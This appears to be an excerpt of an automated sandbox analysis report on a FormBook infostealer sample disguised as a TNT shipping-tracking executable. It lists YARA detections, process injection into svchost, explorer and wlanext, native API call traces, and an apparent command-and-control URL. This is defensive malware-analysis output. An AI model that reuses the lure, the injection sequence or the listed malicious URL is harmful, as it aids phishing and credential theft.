          Source: explorer.exe, 00000003.00000002.3861185504.00000000108FF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.00000000042DF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yR
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.3861610506.0000000010C89000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: TNT AWB TRACKING DETAILS.exe PID: 7420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: wlanext.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A330 NtCreateFile,2_2_0041A330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3E0 NtReadFile,2_2_0041A3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A460 NtClose,2_2_0041A460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A510 NtAllocateVirtualMemory,2_2_0041A510
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3DA NtReadFile,2_2_0041A3DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A45B NtClose,2_2_0041A45B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A50A NtAllocateVirtualMemory,2_2_0041A50A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03472BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,LdrInitializeThunk,2_2_03472AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,LdrInitializeThunk,2_2_03472F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,LdrInitializeThunk,2_2_03472FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03472F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,LdrInitializeThunk,2_2_03472FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03472E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03472EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03472D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03472D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,LdrInitializeThunk,2_2_03472DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03472CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,2_2_03472C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,2_2_034735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_0384A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A042 NtQueryInformationProcess,2_2_0384A042
          Source: C:\Windows\explorer.exeCode function: 3_2_10C72E12 NtProtectVirtualMemory,3_2_10C72E12
          Source: C:\Windows\explorer.exeCode function: 3_2_10C71232 NtCreateFile,3_2_10C71232
          Source: C:\Windows\explorer.exeCode function: 3_2_10C72E0A NtProtectVirtualMemory,3_2_10C72E0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_006FF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,4_2_006FF267
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03912BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03912BE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912B60 NtClose,LdrInitializeThunk,4_2_03912B60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912AD0 NtReadFile,LdrInitializeThunk,4_2_03912AD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912FE0 NtCreateFile,LdrInitializeThunk,4_2_03912FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912F30 NtCreateSection,LdrInitializeThunk,4_2_03912F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_03912EA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912DD0 NtDelayExecution,LdrInitializeThunk,4_2_03912DD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03912DF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03912D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03912CA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03912C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912C60 NtCreateKey,LdrInitializeThunk,4_2_03912C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039135C0 NtCreateMutant,LdrInitializeThunk,4_2_039135C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03914340 NtSetContextThread,4_2_03914340
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03914650 NtSuspendThread,4_2_03914650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912B80 NtQueryInformationFile,4_2_03912B80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912BA0 NtEnumerateValueKey,4_2_03912BA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912AB0 NtWaitForSingleObject,4_2_03912AB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912AF0 NtWriteFile,4_2_03912AF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912F90 NtProtectVirtualMemory,4_2_03912F90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912FB0 NtResumeThread,4_2_03912FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912FA0 NtQuerySection,4_2_03912FA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912F60 NtCreateProcessEx,4_2_03912F60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912E80 NtReadVirtualMemory,4_2_03912E80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912EE0 NtQueueApcThread,4_2_03912EE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912E30 NtWriteVirtualMemory,4_2_03912E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912DB0 NtEnumerateKey,4_2_03912DB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912D00 NtSetInformationFile,4_2_03912D00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912D30 NtUnmapViewOfSection,4_2_03912D30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912CC0 NtQueryVirtualMemory,4_2_03912CC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912CF0 NtOpenProcess,4_2_03912CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03912C00 NtQueryInformationProcess,4_2_03912C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03913090 NtSetValueKey,4_2_03913090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03913010 NtOpenDirectoryObject,4_2_03913010
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_039139B0 NtGetContextThread,4_2_039139B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03913D10 NtOpenProcessToken,4_2_03913D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03913D70 NtOpenThread,4_2_03913D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA330 NtCreateFile,4_2_030EA330
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA3E0 NtReadFile,4_2_030EA3E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA510 NtAllocateVirtualMemory,4_2_030EA510
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA460 NtClose,4_2_030EA460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA3DA NtReadFile,4_2_030EA3DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA50A NtAllocateVirtualMemory,4_2_030EA50A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_030EA45B NtClose,4_2_030EA45B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03689BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_03689BAF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0368A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,4_2_0368A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03689BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_03689BB2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0368A042 NtQueryInformationProcess,4_2_0368A042
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F396980_2_03F39698
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F3CEA00_2_03F3CEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E0C02_2_0041E0C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2AA2_2_0041E2AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E3342_2_0041E334
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DBD22_2_0041DBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D5732_2_0041D573
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EE602_2_0041EE60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E1A2_2_00409E1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E2_2_0041E61E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6392_2_0041E639
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DF122_2_0041DF12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
